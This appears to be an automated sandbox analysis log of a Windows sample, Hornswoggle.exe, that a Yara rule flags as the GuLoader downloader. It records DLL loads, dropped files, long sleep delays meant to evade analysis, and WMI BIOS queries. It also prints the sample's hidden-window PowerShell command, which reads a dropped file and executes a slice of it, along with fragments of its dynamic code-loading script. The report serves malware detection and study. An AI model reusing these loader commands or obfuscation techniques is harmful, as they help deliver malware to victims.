Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Hornswoggle.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: justifikationssager.lnk.0.dr

LNK file: ..\..\..\..\..\Filial195.plo

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Hornswoggle.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.4496761438.0000000008822000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: %jqm.Core.pdb source: powershell.exe, 00000002.00000002.4496761438.0000000008822000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.4497282813.000000000BB30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Millionvises $Slumberproof $Konfiskabel), (Marred @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Kontorsystemernes = [AppDomain]::CurrentDomain.GetAssembl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Shortpassings)), $Elisabeth).DefineDynamicModule($Lodowick110, $false).DefineType($Rakkerkulers, $Begribeliges, [System.MulticastDeleg

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Hornswoggle.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) "
Source: C:\Users\user\Desktop\Hornswoggle.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Warlordism=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Udateret90.Lis';$Gallophile=$Warlordism.SubString(72191,3);.$Gallophile($Warlordism) "			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_03120B35 push ebx; iretd	2_2_03120B42
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0312E9F9 push eax; mov dword ptr [esp], edx	2_2_0312EA0C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_03121163 push eax; ret	2_2_0312117A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_03121190 push eax; ret	2_2_0312119A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_03121180 push eax; ret	2_2_0312118A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_031211A0 push eax; ret	2_2_031211AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_091E2110 push esi; ret	2_2_091E2156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_091E394A push dword ptr [edx]; retf	2_2_091E3979
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_091E485E pushad ; iretd	2_2_091E486A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_091E4878 pushad ; iretd	2_2_091E486A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_091E3B38 push D7802852h; retf	2_2_091E3B3D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_091E2356 push cs; retf	2_2_091E235D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_091E2273 pushfd ; ret	2_2_091E2278
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_091E32B3 push ebp; iretd	2_2_091E32CB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_091E559D push edi; iretd	2_2_091E55B2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_091E4DF2 push edx; iretd	2_2_091E4DF4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_091E1667 push ss; retf	2_2_091E166A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_091E3ECF push esi; iretd	2_2_091E3EDB

Source: C:\Users\user\Desktop\Hornswoggle.exe

File created: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\nsExec.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Hornswoggle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hornswoggle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7498			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2145			Jump to behavior

Source: C:\Users\user\Desktop\Hornswoggle.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\nsExec.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2680	Thread sleep time: -5534023222112862s >= -30000s			Jump to behavior
Source: C:\Windows\System32\SIHClient.exe TID: 6512	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Users\user\Desktop\Hornswoggle.exe	Code function: 0_2_00406167 FindFirstFileA,FindClose,	0_2_00406167
Source: C:\Users\user\Desktop\Hornswoggle.exe	Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405705
Source: C:\Users\user\Desktop\Hornswoggle.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000002.00000002.4490278168.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\jq
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.2.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.4490278168.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\jq
